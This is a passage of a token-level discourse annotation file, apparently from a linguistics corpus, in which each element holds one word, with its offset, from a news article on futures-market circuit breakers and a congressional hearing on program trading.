<desc id="654" len="3" off="1792">the</desc>
<desc id="656" len="8" off="1796">contract</desc>
<desc id="658" len="8" off="1805">reopened</desc>
<desc id="660" len="1" off="1813">,</desc>
<desc id="662" len="3" off="1815">the</desc>
<desc id="664" len="10" off="1819">subsequent</desc>
<desc id="666" len="5" off="1830">flood</desc>
<desc id="668" len="2" off="1836">of</desc>
<desc id="670" len="4" off="1839">sell</desc>
<desc id="672" len="6" off="1844">orders</desc>
<desc id="674" len="4" off="1851">that</desc>
<desc id="676" len="7" off="1857">quickly</desc>
<desc id="678" len="7" off="1865">knocked</desc>
<desc id="680" len="3" off="1873">the</desc>
<desc id="682" len="8" off="1877">contract</desc>
<desc id="684" len="4" off="1886">down</desc>
<desc id="686" len="2" off="1891">to</desc>
<desc id="688" len="3" off="1894">the</desc>
<desc id="690" len="8" off="1898">30-point</desc>
<desc id="692" len="5" off="1907">limit</desc>
<desc id="694" len="9" off="1913">indicated</desc>
<desc id="696" len="4" off="1923">that</desc>
<desc id="698" len="3" off="1928">the</desc>
<desc id="700" len="12" off="1933">intermediate</desc>
<desc id="702" len="5" off="1946">limit</desc>
<desc id="704" len="2" off="1952">of</desc>
<desc id="706" len="2" off="1955">20</desc>
<desc id="708" len="6" off="1958">points</desc>
<desc id="710" len="3" off="1965">was</desc>
<desc id="712" len="6" off="1969">needed</desc>
<desc id="714" len="2" off="1976">to</desc>
<desc id="716" len="4" off="1979">help</desc>
<desc id="718" len="4" off="1984">keep</desc>
<desc id="720" len="5" off="1989">stock</desc>
<desc id="722" len="3" off="1995">and</desc>
<desc id="724" len="11" off="1999">stock-index</desc>
<desc id="726" len="7" off="2012">futures</desc>
<desc id="728" len="6" off="2020">prices</desc>
<desc id="730" len="12" off="2027">synchronized</desc>
<desc id="732" len="1" off="2039">.</desc>
<desc id="735" len="7" off="2041">Several</desc>
<desc id="737" len="7" off="2049">traders</desc>
<desc id="739" len="10" off="2057">maintained</desc>
<desc id="741" len="4" off="2068">that</desc>
<desc id="743" len="3" off="2073">the</desc>
<desc id="745" len="4" off="2077">Merc</desc>
<desc id="747" len="2" off="2081">'s</desc>
<desc id="749" len="8" off="2084">12-point</desc>
<desc id="751" len="15" off="2094">circuit-breaker</desc>
<desc id="753" len="10" off="2110">aggravated</desc>
<desc id="755" len="3" off="2121">the</desc>
<desc id="757" len="6" off="2125">market</desc>
<desc id="759" len="5" off="2132">slide</desc>
<desc id="761" len="4" off="2138">Oct.</desc>
<desc id="763" len="2" off="2143">13</desc>
<desc id="765" len="2" off="2146">by</desc>
<desc id="767" len="9" off="2149">directing</desc>
<desc id="769" len="10" off="2159">additional</desc>
<desc id="771" len="7" off="2171">selling</desc>
<desc id="773" len="8" off="2179">pressure</desc>
<desc id="775" len="2" off="2188">to</desc>
<desc id="777" len="3" off="2191">the</desc>
<desc id="779" len="5" off="2195">floor</desc>
<desc id="781" len="2" off="2201">of</desc>
<desc id="783" len="3" off="2204">the</desc>
<desc id="785" len="3" off="2208">New</desc>
<desc id="787" len="4" off="2212">York</desc>
<desc id="789" len="5" off="2217">Stock</desc>
<desc id="791" len="8" off="2223">Exchange</desc>
<desc id="793" len="1" off="2231">.</desc>
<desc id="796" len="3" off="2233">All</desc>
<desc id="798" len="2" off="2237">of</desc>
<desc id="800" len="3" off="2240">the</desc>
<desc id="802" len="7" off="2244">changes</desc>
<desc id="804" len="7" off="2253">require</desc>
<desc id="806" len="10" off="2261">regulatory</desc>
<desc id="808" len="8" off="2272">approval</desc>
<desc id="810" len="1" off="2280">,</desc>
<desc id="812" len="5" off="2282">which</desc>
<desc id="814" len="2" off="2288">is</desc>
<desc id="816" len="8" off="2291">expected</desc>
<desc id="818" len="7" off="2300">shortly</desc>
<desc id="820" len="1" off="2307">.</desc>
<desc id="823" len="3" off="2309">The</desc>
<desc id="825" len="8" off="2313">exchange</desc>
<desc id="827" len="4" off="2322">also</desc>
<desc id="829" len="4" off="2327">said</desc>
<desc id="831" len="4" off="2333">that</desc>
<desc id="833" len="3" off="2338">the</desc>
<desc id="835" len="8" off="2342">30-point</desc>
<desc id="837" len="7" off="2351">circuit</desc>
<desc id="839" len="7" off="2359">breaker</desc>
<desc id="841" len="1" off="2366">,</desc>
<desc id="843" len="5" off="2368">which</desc>
<desc id="845" len="9" off="2374">currently</desc>
<desc id="847" len="8" off="2384">provides</desc>
<desc id="849" len="4" off="2393">only</desc>
<desc id="851" len="1" off="2398">a</desc>
<desc id="853" len="8" off="2400">one-hour</desc>
<desc id="855" len="7" off="2410">respite</desc>
<desc id="857" len="6" off="2418">during</desc>
<desc id="859" len="6" off="2425">market</desc>
<desc id="861" len="9" off="2432">sell-offs</desc>
<desc id="863" len="1" off="2441">,</desc>
<desc id="865" len="4" off="2443">will</desc>
<desc id="867" len="6" off="2448">become</desc>
<desc id="869" len="3" off="2455">the</desc>
<desc id="871" len="7" off="2459">maximum</desc>
<desc id="873" len="7" off="2467">one-day</desc>
<desc id="875" len="5" off="2475">limit</desc>
<desc id="877" len="3" off="2481">for</desc>
<desc id="879" len="3" off="2485">the</desc>
<desc id="881" len="3" off="2490">S&P</desc>
<desc id="883" len="3" off="2494">500</desc>
<desc id="885" len="11" off="2498">stock-index</desc>
<desc id="887" len="7" off="2510">futures</desc>
<desc id="889" len="8" off="2518">contract</desc>
<desc id="891" len="1" off="2526">;</desc>
<desc id="893" len="3" off="2528">the</desc>
<desc id="895" len="7" off="2532">one-day</desc>
<desc id="897" len="5" off="2540">limit</desc>
<desc id="899" len="3" off="2546">now</desc>
<desc id="901" len="2" off="2550">is</desc>
<desc id="903" len="2" off="2553">50</desc>
<desc id="905" len="5" off="2556">index</desc>
<desc id="907" len="6" off="2562">points</desc>
<desc id="909" len="1" off="2568">.</desc>
<desc id="912" len="1" off="2571">A</desc>
<desc id="914" len="5" off="2573">final</desc>
<desc id="916" len="12" off="2579">modification</desc>
<desc id="918" len="3" off="2592">was</desc>
<desc id="920" len="4" off="2596">made</desc>
<desc id="922" len="2" off="2601">to</desc>
<desc id="924" len="3" off="2604">the</desc>
<desc id="926" len="10" off="2608">five-point</desc>
<desc id="928" len="7" off="2619">opening</desc>
<desc id="930" len="5" off="2627">limit</desc>
<desc id="932" len="3" off="2633">for</desc>
<desc id="934" len="3" off="2637">the</desc>
<desc id="936" len="8" off="2641">contract</desc>
<desc id="938" len="1" off="2649">.</desc>
<desc id="941" len="3" off="2652">The</desc>
<desc id="943" len="4" off="2656">Merc</desc>
<desc id="945" len="4" off="2661">said</desc>
<desc id="947" len="4" off="2666">that</desc>
<desc id="949" len="10" off="2671">five-point</desc>
<desc id="951" len="5" off="2682">limit</desc>
<desc id="953" len="4" off="2688">will</desc>
<desc id="955" len="6" off="2693">remain</desc>
<desc id="957" len="2" off="2700">in</desc>
<desc id="959" len="6" off="2703">effect</desc>
<desc id="961" len="3" off="2710">for</desc>
<desc id="963" len="3" off="2714">the</desc>
<desc id="965" len="5" off="2718">first</desc>
<desc id="967" len="2" off="2724">10</desc>
<desc id="969" len="7" off="2727">minutes</desc>
<desc id="971" len="2" off="2736">of</desc>
<desc id="973" len="7" off="2739">trading</desc>
<desc id="975" len="1" off="2746">.</desc>
<desc id="978" len="3" off="2748">The</desc>
<desc id="980" len="5" off="2752">limit</desc>
<desc id="982" len="6" off="2758">lapses</desc>
<desc id="984" len="5" off="2765">under</desc>
<desc id="986" len="7" off="2771">current</desc>
<desc id="988" len="8" off="2779">exchange</desc>
<desc id="990" len="5" off="2788">rules</desc>
<desc id="992" len="2" off="2794">if</desc>
<desc id="994" len="9" off="2797">contracts</desc>
<desc id="996" len="5" off="2807">trade</desc>
<desc id="998" len="5" off="2813">above</desc>
<desc id="1000" len="3" off="2820">the</desc>
<desc id="1002" len="5" off="2824">limit</desc>
<desc id="1004" len="5" off="2830">price</desc>
<desc id="1006" len="6" off="2836">during</desc>
<desc id="1008" len="3" off="2843">the</desc>
<desc id="1010" len="7" off="2847">opening</desc>
<desc id="1012" len="2" off="2855">10</desc>
<desc id="1014" len="7" off="2858">minutes</desc>
<desc id="1016" len="2" off="2866">of</desc>
<desc id="1018" len="7" off="2869">trading</desc>
<desc id="1020" len="1" off="2876">.</desc>
<desc id="1023" len="2" off="2878">In</desc>
<desc id="1025" len="10" off="2881">Washington</desc>
<desc id="1027" len="1" off="2891">,</desc>
<desc id="1029" len="5" off="2893">House</desc>
<desc id="1031" len="5" off="2900">aides</desc>
<desc id="1033" len="4" off="2906">said</desc>
<desc id="1035" len="3" off="2911">Mr.</desc>
<desc id="1037" len="6" off="2915">Phelan</desc>
<desc id="1039" len="4" off="2922">told</desc>
<desc id="1041" len="11" off="2927">congressmen</desc>
<desc id="1043" len="4" off="2939">that</desc>
<desc id="1045" len="3" off="2944">the</desc>
<desc id="1047" len="6" off="2948">collar</desc>
<desc id="1049" len="1" off="2954">,</desc>
<desc id="1051" len="5" off="2956">which</desc>
<desc id="1053" len="6" off="2962">banned</desc>
<desc id="1055" len="7" off="2969">program</desc>
<desc id="1057" len="6" off="2977">trades</desc>
<desc id="1059" len="7" off="2985">through</desc>
<desc id="1061" len="3" off="2993">the</desc>
<desc id="1063" len="3" off="2997">Big</desc>
<desc id="1065" len="5" off="3001">Board</desc>
<desc id="1067" len="2" off="3006">'s</desc>
<desc id="1069" len="8" off="3009">computer</desc>
<desc id="1071" len="4" off="3018">when</desc>
<desc id="1073" len="3" off="3023">the</desc>
<desc id="1075" len="3" off="3027">Dow</desc>
<desc id="1077" len="5" off="3031">Jones</desc>
<desc id="1079" len="10" off="3037">Industrial</desc>
<desc id="1081" len="7" off="3048">Average</desc>
<desc id="1083" len="5" off="3056">moved</desc>
<desc id="1085" len="2" off="3062">50</desc>
<desc id="1087" len="6" off="3066">points</desc>
<desc id="1089" len="1" off="3072">,</desc>
<desc id="1091" len="3" off="3074">did</desc>
<desc id="1093" len="3" off="3077">n't</desc>
<desc id="1095" len="4" off="3081">work</desc>
<desc id="1097" len="4" off="3086">well</desc>
<desc id="1099" len="1" off="3090">.</desc>
<desc id="1102" len="2" off="3092">He</desc>
<desc id="1104" len="4" off="3095">said</desc>
<desc id="1106" len="4" off="3100">that</desc>
<desc id="1108" len="5" off="3105">firms</desc>
<desc id="1110" len="5" off="3111">could</desc>
<desc id="1112" len="3" off="3117">get</desc>
<desc id="1114" len="6" off="3121">around</desc>
<desc id="1116" len="3" off="3128">the</desc>
<desc id="1118" len="6" off="3132">collar</desc>
<desc id="1120" len="2" off="3139">by</desc>
<desc id="1122" len="9" off="3142">executing</desc>
<desc id="1124" len="6" off="3153">trades</desc>
<desc id="1126" len="8" off="3160">manually</desc>
<desc id="1128" len="1" off="3168">.</desc>
<desc id="1131" len="2" off="3170">In</desc>
<desc id="1133" len="1" off="3173">a</desc>
<desc id="1135" len="12" off="3175">post-hearing</desc>
<desc id="1137" len="4" off="3188">news</desc>
<desc id="1139" len="10" off="3193">conference</desc>
<desc id="1141" len="1" off="3203">,</desc>
<desc id="1143" len="3" off="3205">Mr.</desc>
<desc id="1145" len="6" off="3209">Phelan</desc>
<desc id="1147" len="1" off="3215">,</desc>
<desc id="1149" len="3" off="3217">who</desc>
<desc id="1151" len="3" off="3221">has</desc>
<desc id="1153" len="8" off="3225">publicly</desc>
<desc id="1155" len="9" off="3235">expressed</desc>
<desc id="1157" len="7" off="3245">concern</desc>
<desc id="1159" len="5" off="3253">about</desc>
<desc id="1161" len="6" off="3259">market</desc>
<desc id="1163" len="10" off="3266">volatility</desc>
<desc id="1165" len="1" off="3276">,</desc>
<desc id="1167" len="4" off="3278">said</desc>
<desc id="1169" len="2" off="3283">he</desc>
<desc id="1171" len="4" off="3286">told</desc>
<desc id="1173" len="3" off="3291">the</desc>
<desc id="1175" len="5" off="3295">House</desc>
<desc id="1177" len="7" off="3301">finance</desc>
<desc id="1179" len="3" off="3309">and</desc>
<desc id="1181" len="18" off="3314">telecommunications</desc>
<desc id="1183" len="12" off="3333">subcommittee</desc>
<desc id="1185" len="4" off="3346">that</desc>
<desc id="1187" len="2" off="3351">he</desc>
<desc id="1189" len="5" off="3354">would</desc>
<desc id="1191" len="7" off="3360">support</desc>
<desc id="1193" len="3" off="3368">the</desc>
<desc id="1195" len="15" off="3372">program-trading</desc>
<desc id="1197" len="4" off="3388">halt</desc>
<desc id="1199" len="8" off="3393">proposal</desc>
<desc id="1201" len="2" off="3403">``</desc>
<desc id="1203" len="9" off="3405">providing</desc>
<desc id="1205" len="3" off="3415">the</desc>
<desc id="1207" len="3" off="3419">SEC</desc>
<desc id="1209" len="5" off="3423">would</desc>
<desc id="1211" len="2" off="3429">be</desc>
<desc id="1213" len="11" off="3432">comfortable</desc>
<desc id="1215" len="4" off="3444">with</desc>
<desc id="1217" len="3" off="3449">the</desc>
<desc id="1219" len="8" off="3453">language</desc>
<desc id="1221" len="2" off="3461">''</desc>
<desc id="1223" len="2" off="3464">in</desc>
<desc id="1225" len="1" off="3467">a</desc>
<desc id="1227" len="4" off="3469">bill</desc>
<desc id="1229" len="1" off="3473">.</desc>
<desc id="1232" len="3" off="3475">The</desc>
<desc id="1234" len="15" off="3480">program-trading</desc>
<desc id="1236" len="5" off="3496">issue</desc>
<desc id="1238" len="2" off="3502">is</desc>
<desc id="1240" len="7" off="3505">heating</desc>
<desc id="1242" len="2" off="3513">up</desc>
<desc id="1244" len="2" off="3516">on</desc>
<desc id="1246" len="7" off="3519">Capitol</desc>
<desc id="1248" len="4" off="3527">Hill</desc>
<desc id="1250" len="2" off="3532">as</desc>
<desc id="1252" len="2" off="3535">it</desc>
<desc id="1254" len="2" off="3538">is</desc>
<desc id="1256" len="2" off="3541">on</desc>
<desc id="1258" len="4" off="3544">Wall</desc>
<desc id="1260" len="6" off="3549">Street</desc>
<desc id="1262" len="1" off="3555">,</desc>
<desc id="1264" len="3" off="3557">and</desc>
<desc id="1266" len="7" off="3562">several</desc>
<desc id="1268" len="11" off="3570">legislators</desc>
<desc id="1270" len="4" off="3582">want</desc>
<desc id="1272" len="2" off="3587">to</desc>
<desc id="1274" len="5" off="3590">grant</desc>
<desc id="1276" len="3" off="3596">the</desc>
<desc id="1278" len="3" off="3600">SEC</desc>
<desc id="1280" len="3" off="3604">the</desc>
<desc id="1282" len="5" off="3608">power</desc>
<desc id="1284" len="2" off="3614">to</desc>
<desc id="1286" len="4" off="3617">shut</desc>
<desc id="1288" len="3" off="3622">off</desc>
<desc id="1290" len="3" off="3626">the</desc>
<desc id="1292" len="8" off="3630">programs</desc>
<desc id="1294" len="4" off="3640">when</desc>
<desc id="1296" len="7" off="3645">trading</desc>
<desc id="1298" len="7" off="3653">becomes</desc>
<desc id="1300" len="3" off="3661">too</desc>
<desc id="1302" len="8" off="3665">volatile</desc>
<desc id="1304" len="1" off="3673">.</desc>
<desc id="1307" len="3" off="3675">SEC</desc>
<desc id="1309" len="8" off="3679">Chairman</desc>
<desc id="1311" len="7" off="3688">Richard</desc>
<desc id="1313" len="7" off="3696">Breeden</desc>
<desc id="1315" len="3" off="3704">has</desc>
<desc id="1317" len="4" off="3708">said</desc>
<desc id="1319" len="2" off="3713">he</desc>
<desc id="1321" len="5" off="3716">would</desc>
<desc id="1323" len="2" off="3722">be</desc>
<desc id="1325" len="7" off="3726">willing</desc>
<desc id="1327" len="2" off="3734">to</desc>
<desc id="1329" len="8" off="3737">consider</desc>
<desc id="1331" len="7" off="3746">circuit</desc>
<desc id="1333" len="8" off="3754">breakers</desc>
<desc id="1335" len="4" off="3763">that</desc>
<desc id="1337" len="4" off="3768">have</desc>
<desc id="1339" len="6" off="3773">preset</desc>
<desc id="1341" len="7" off="3780">trigger</desc>
<desc id="1343" len="6" off="3788">points</desc>
<desc id="1345" len="1" off="3794">,</desc>
<desc id="1347" len="3" off="3796">but</desc>
<desc id="1349" len="2" off="3800">he</desc>
<desc id="1351" len="4" off="3803">does</desc>
<desc id="1353" len="3" off="3807">n't</desc>
<desc id="1355" len="4" off="3812">want</desc>
<desc id="1357" len="13" off="3817">discretionary</desc>
<desc id="1359" len="5" off="3831">power</desc>
<desc id="1361" len="2" off="3837">to</desc>
<desc id="1363" len="4" off="3840">stop</desc>
<desc id="1365" len="8" off="3845">programs</desc>
<desc id="1367" len="1" off="3853">.</desc>
<desc id="1370" len="1" off="3855">A</desc>
<desc id="1372" len="5" off="3857">House</desc>
<desc id="1374" len="4" off="3863">aide</desc>
<desc id="1376" len="9" off="3868">suggested</desc>
<desc id="1378" len="4" off="3878">that</desc>
<desc id="1380" len="3" off="3883">Mr.</desc>
<desc id="1382" len="6" off="3887">Phelan</desc>
<desc id="1384" len="3" off="3894">was</desc>
<desc id="1386" len="2" off="3899">so</desc>
<desc id="1388" len="2" off="3902">``</desc>
<desc id="1390" len="5" off="3904">vague</desc>
<desc id="1392" len="3" off="3910">and</desc>
<desc id="1394" len="5" off="3914">mushy</desc>
<desc id="1396" len="2" off="3919">''</desc>
<desc id="1398" len="4" off="3922">that</desc>
<desc id="1400" len="2" off="3927">it</desc>
<desc id="1402" len="3" off="3930">was</desc>
<desc id="1404" len="3" off="3934">the</desc>
<desc id="1406" len="4" off="3938">kind</desc>
<desc id="1408" len="2" off="3943">of</desc>
<desc id="1410" len="7" off="3946">meeting</desc>
<desc id="1412" len="5" off="3954">where</desc>
<desc id="1414" len="6" off="3960">people</desc>
<desc id="1416" len="2" off="3967">of</desc>
<desc id="1418" len="3" off="3970">all</desc>
<desc id="1420" len="10" off="3974">viewpoints</desc>
<desc id="1422" len="5" off="3986">could</desc>
<desc id="1424" len="2" off="3992">``</desc>
<desc id="1426" len="4" off="3994">come</desc>
<desc id="1428" len="3" off="3999">out</desc>
<desc id="1430" len="7" off="4003">feeling</desc>
<desc id="1432" len="4" off="4011">good</desc>
<desc id="1434" len="1" off="4015">.</desc>
<desc id="1436" len="2" off="4016">''</desc>
<desc id="1439" len="2" off="4019">At</desc>
<desc id="1441" len="3" off="4022">one</desc>
<desc id="1443" len="5" off="4026">point</desc>
<desc id="1445" len="1" off="4031">,</desc>
<desc id="1447" len="3" off="4033">Mr.</desc>
<desc id="1449" len="6" off="4037">Phelan</desc>
<desc id="1451" len="7" off="4044">angered</desc>
<desc id="1453" len="3" off="4052">the</desc>
<desc id="1455" len="12" off="4056">subcommittee</desc>
<desc id="1457" len="2" off="4068">'s</desc>
<desc id="1459" len="8" off="4072">chairman</desc>
<desc id="1461" len="1" off="4080">,</desc>
<desc id="1463" len="4" off="4082">Rep.</desc>
<desc id="1465" len="6" off="4087">Edward</desc>
<desc id="1467" len="6" off="4094">Markey</desc>
<desc id="1469" len="2" off="4101">D.</desc>
<desc id="1471" len="1" off="4103">,</desc>
<desc id="1473" len="5" off="4105">Mass.</desc>
<desc id="1475" len="1" off="4110">,</desc>
<desc id="1477" len="2" off="4112">by</desc>
<desc id="1479" len="3" off="4115">not</desc>
<desc id="1481" len="5" off="4119">going</desc>
<desc id="1483" len="4" off="4125">much</desc>
<desc id="1485" len="6" off="4130">beyond</desc>
<desc id="1487" len="4" off="4137">what</desc>
<desc id="1489" len="7" off="4142">already</desc>
<desc id="1491" len="3" off="4150">had</desc>
<desc id="1493" len="4" off="4154">been</desc>
<desc id="1495" len="8" off="4160">reported</desc>
<desc id="1497" len="2" off="4169">in</desc>
<desc id="1499" len="3" off="4172">the</desc>
<desc id="1501" len="7" off="4176">morning</desc>
<desc id="1503" len="10" off="4184">newspapers</desc>
<desc id="1505" len="1" off="4194">.</desc>
<desc id="1508" len="2" off="4196">``</desc>
<desc id="1510" len="6" off="4198">Markey</desc>
<desc id="1512" len="4" off="4205">said</desc>
<desc id="1514" len="2" off="4210">we</desc>
<desc id="1516" len="5" off="4213">could</desc>
<desc id="1518" len="4" off="4219">have</desc>
<desc id="1520" len="4" off="4224">done</desc>
<desc id="1522" len="4" off="4229">this</desc>
<desc id="1524" len="2" off="4234">in</desc>
<desc id="1526" len="6" off="4237">public</desc>
<desc id="1528" len="2" off="4243">''</desc>
<desc id="1530" len="7" off="4247">because</desc>
<desc id="1532" len="2" off="4255">so</desc>
<desc id="1534" len="6" off="4258">little</desc>
<desc id="1536" len="9" off="4265">sensitive</desc>
<desc id="1538" len="11" off="4275">information</desc>
<desc id="1540" len="3" off="4287">was</desc>
<desc id="1542" len="9" off="4291">disclosed</desc>
<desc id="1544" len="1" off="4300">,</desc>
<desc id="1546" len="3" off="4302">the</desc>
<desc id="1548" len="4" off="4306">aide</desc>
<desc id="1550" len="4" off="4311">said</desc>
<desc id="1552" len="1" off="4315">.</desc>
<desc id="1555" len="3" off="4317">Mr.</desc>
<desc id="1557" len="6" off="4321">Phelan</desc>
<desc id="1559" len="4" off="4328">then</desc>
<desc id="1561" len="9" off="4334">responded</desc>
<desc id="1563" len="4" off="4344">that</desc>
<desc id="1565" len="2" off="4349">he</desc>
<desc id="1567" len="5" off="4352">would</desc>
<desc id="1569" len="4" off="4358">have</desc>
<desc id="1571" len="4" off="4363">been</desc>
<desc id="1573" len="5" off="4368">happy</desc>
<desc id="1575" len="4" off="4374">just</desc>
<desc id="1577" len="7" off="4379">writing</desc>
<desc id="1579" len="1" off="4387">a</desc>
<desc id="1581" len="6" off="4389">report</desc>
<desc id="1583" len="2" off="4396">to</desc>
<desc id="1585" len="3" off="4399">the</desc>
<desc id="1587" len="5" off="4403">panel</desc>
<desc id="1589" len="1" off="4408">,</desc>
<desc id="1591" len="3" off="4410">the</desc>
<desc id="1593" len="4" off="4414">aide</desc>
<desc id="1595" len="5" off="4419">added</desc>
<desc id="1597" len="1" off="4424">.</desc>
<desc id="1600" len="2" off="4427">At</desc>
<desc id="1602" len="7" off="4430">another</desc>
<desc id="1604" len="5" off="4438">point</desc>
<desc id="1606" len="6" off="4444">during</desc>
<desc id="1608" len="3" off="4451">the</desc>
<desc id="1610" len="7" off="4455">hearing</desc>
<desc id="1612" len="1" off="4462">,</desc>
<desc id="1614" len="4" off="4464">Rep.</desc>
<desc id="1616" len="6" off="4469">Markey</desc>
<desc id="1618" len="5" off="4476">asked</desc>
<desc id="1620" len="3" off="4482">Mr.</desc>
<desc id="1622" len="6" off="4486">Phelan</desc>
<desc id="1624" len="4" off="4493">what</desc>
<desc id="1626" len="5" off="4498">would</desc>
<desc id="1628" len="2" off="4504">be</desc>
<desc id="1630" len="9" off="4507">discussed</desc>
<desc id="1632" len="2" off="4518">at</desc>
<desc id="1634" len="1" off="4521">a</desc>
<desc id="1636" len="3" off="4523">New</desc>
<desc id="1638" len="4" off="4527">York</desc>
<desc id="1640" len="8" off="4532">exchange</desc>
<desc id="1642" len="5" off="4541">board</desc>
<desc id="1644" len="7" off="4547">meeting</desc>
<desc id="1646" len="5" off="4555">today</desc>
<desc id="1648" len="1" off="4560">.</desc>
<desc id="1651" len="3" off="4562">Mr.</desc>
<desc id="1653" len="6" off="4566">Phelan</desc>
<desc id="1655" len="4" off="4573">said</desc>
<desc id="1657" len="3" off="4578">the</desc>
<desc id="1659" len="3" off="4582">Big</desc>
<desc id="1661" len="5" off="4586">Board</desc>
<desc id="1663" len="2" off="4592">is</desc>
<desc id="1665" len="6" off="4595">likely</desc>
<desc id="1667" len="2" off="4602">to</desc>
<desc id="1669" len="5" off="4606">study</desc>
<desc id="1671" len="3" off="4612">the</desc>
<desc id="1673" len="15" off="4616">program-trading</desc>
<desc id="1675" len="5" off="4632">issue</desc>
<desc id="1677" len="1" off="4637">.</desc>
<desc id="1680" len="4" off="4639">That</desc>
<desc id="1682" len="8" off="4644">response</desc>
<desc id="1684" len="7" off="4653">annoyed</desc>
<desc id="1686" len="4" off="4661">Rep.</desc>
<desc id="1688" len="6" off="4666">Markey</desc>
<desc id="1690" len="1" off="4672">,</desc>
<desc id="1692" len="5" off="4674">House</desc>
<desc id="1694" len="5" off="4680">aides</desc>
<desc id="1696" len="4" off="4686">said</desc>
<desc id="1698" len="1" off="4690">,</desc>
<desc id="1700" len="3" off="4692">and</desc>
<desc id="1702" len="3" off="4697">the</desc>
<desc id="1704" len="11" off="4701">congressman</desc>
<desc id="1706" len="7" off="4713">snapped</desc>
<desc id="1708" len="4" off="4721">back</desc>
<desc id="1710" len="4" off="4726">that</desc>
<desc id="1712" len="5" off="4731">there</desc>
<desc id="1714" len="3" off="4737">had</desc>
<desc id="1716" len="4" off="4741">been</desc>
<desc id="1718" len="6" off="4746">enough</desc>
<desc id="1720" len="7" off="4753">studies</desc>
<desc id="1722" len="2" off="4761">of</desc>
<desc id="1724" len="3" off="4764">the</desc>
<desc id="1726" len="5" off="4768">issue</desc>
<desc id="1728" len="3" off="4774">and</desc>
<desc id="1730" len="4" off="4778">that</desc>
<desc id="1732" len="2" off="4783">it</desc>
<desc id="1734" len="3" off="4787">was</desc>
<desc id="1736" len="4" off="4791">time</desc>
<desc id="1738" len="3" off="4796">for</desc>
<desc id="1740" len="6" off="4800">action</desc>
<desc id="1742" len="2" off="4807">on</desc>
<desc id="1744" len="3" off="4810">the</desc>
<desc id="1746" len="6" off="4814">matter</desc>
<desc id="1748" len="1" off="4820">.</desc>
<desc id="1751" len="7" off="4822">Fifteen</desc>
<desc id="1753" len="2" off="4830">of</desc>
<desc id="1755" len="3" off="4833">the</desc>
<desc id="1757" len="2" off="4837">26</desc>
<desc id="1759" len="12" off="4840">subcommittee</desc>
<desc id="1761" len="7" off="4853">members</desc>
<desc id="1763" len="8" off="4861">attended</desc>
<desc id="1765" len="3" off="4870">the</desc>
<desc id="1767" len="7" off="4875">hearing</desc>
<desc id="1769" len="1" off="4882">,</desc>
<desc id="1771" len="4" off="4884">most</desc>
<desc id="1773" len="7" off="4889">notably</desc>
<desc id="1775" len="4" off="4897">Rep.</desc>
<desc id="1777" len="4" off="4902">John</desc>
<desc id="1779" len="7" off="4907">Dingell</desc>
<desc id="1781" len="2" off="4915">D.</desc>
<desc id="1783" len="1" off="4917">,</desc>
<desc id="1785" len="5" off="4919">Mich.</desc>
<desc id="1787" len="1" off="4924">,</desc>
<desc id="1789" len="3" off="4926">the</desc>
<desc id="1791" len="4" off="4930">full</desc>
<desc id="1793" len="5" off="4935">House</desc>
<desc id="1795" len="6" off="4941">Energy</desc>
<desc id="1797" len="3" off="4948">and</desc>
<desc id="1799" len="8" off="4952">Commerce</desc>
<desc id="1801" len="9" off="4962">Committee</desc>
<desc id="1803" len="8" off="4972">chairman</desc>
<desc id="1805" len="1" off="4980">,</desc>
<desc id="1807" len="3" off="4982">who</desc>
<desc id="1809" len="3" off="4986">has</desc>
<desc id="1811" len="4" off="4990">been</desc>
<desc id="1813" len="7" off="4995">willing</desc>
<desc id="1815" len="2" off="5003">to</desc>
<desc id="1817" len="3" off="5006">let</desc>
<desc id="1819" len="3" off="5010">Mr.</desc>
<desc id="1821" len="6" off="5014">Markey</desc>
<desc id="1823" len="5" off="5021">carry</desc>
<desc id="1825" len="3" off="5027">the</desc>
<desc id="1827" len="11" off="5031">legislation</desc>
<desc id="1829" len="2" off="5043">in</desc>
<desc id="1831" len="6" off="5046">recent</desc>
<desc id="1833" len="6" off="5054">months</desc>
<desc id="1835" len="1" off="5060">.</desc>
<desc id="1838" len="3" off="5062">Mr.</desc>
<desc id="1840" len="7" off="5066">Dingell</desc>
<desc id="1842" len="9" off="5074">expressed</desc>
<desc id="1844" len="7" off="5084">concern</desc>
<desc id="1846" len="1" off="5091">,</desc>
<desc id="1848" len="7" off="5093">sources</desc>
<desc id="1850" len="4" off="5101">said</desc>
<desc id="1852" len="1" off="5105">,</desc>
<desc id="1854" len="5" off="5107">about</desc>
<desc id="1856" len="14" off="5113">jurisdictional</desc>
<desc id="1858" len="8" off="5128">problems</desc>
<desc id="1860" len="2" off="5137">in</desc>
<desc id="1862" len="10" off="5141">regulating</desc>
<desc id="1864" len="7" off="5152">program</desc>
<desc id="1866" len="7" off="5160">trading</desc>
<desc id="1868" len="1" off="5167">,</desc>
<desc id="1870" len="5" off="5169">which</desc>
<desc id="1872" len="4" off="5175">uses</desc>
<desc id="1874" len="7" off="5180">futures</desc>
<desc id="1876" len="2" off="5188">to</desc>
<desc id="1878" len="6" off="5191">offset</desc>
<desc id="1880" len="5" off="5198">stock</desc>
<desc id="1882" len="6" off="5204">trades</desc>
<desc id="1884" len="1" off="5210">.</desc>
<desc id="1887" len="3" off="5212">The</desc>
<desc id="1889" len="7" off="5216">futures</desc>
<desc id="1891" len="8" off="5224">industry</desc>
<desc id="1893" len="2" off="5234">is</desc>
<desc id="1895" len="9" off="5237">regulated</desc>
<desc id="1897" len="2" off="5247">by</desc>
<desc id="1899" len="3" off="5250">the</desc>
<desc id="1901" len="9" off="5254">Commodity</desc>
<desc id="1903" len="7" off="5264">Futures</desc>
<desc id="1905" len="7" off="5272">Trading</desc>
<desc id="1907" len="10" off="5280">Commission</desc>
<desc id="1909" len="1" off="5290">,</desc>
<desc id="1911" len="5" off="5292">which</desc>
<desc id="1913" len="7" off="5298">reports</desc>
<desc id="1915" len="2" off="5306">to</desc>
<desc id="1917" len="3" off="5309">the</desc>
<desc id="1919" len="11" off="5313">Agriculture</desc>
<desc id="1921" len="10" off="5326">committees</desc>
<desc id="1923" len="2" off="5337">in</desc>
<desc id="1925" len="4" off="5340">both</desc>
<desc id="1927" len="6" off="5345">houses</desc>
<desc id="1929" len="1" off="5351">.</desc>
</rep>
<rep id="edu.mit.discourse.rep.refexp">
<desc id="3289" len="31" off="0">2~4~6~8</desc>
<desc id="3290" len="2" off="37">12</desc>
<desc id="3291" len="66" off="59">20~22~24~26~28~30~32~34~36~38~40</desc>
<desc id="3292" len="13" off="112">38~40</desc>
<desc id="3293" len="12" off="139">49~51</desc>
<desc id="3294" len="35" off="157">55~57~59~61~63</desc>
<desc id="3295" len="10" off="196">67</desc>
<desc id="3296" len="2" off="212">71</desc>
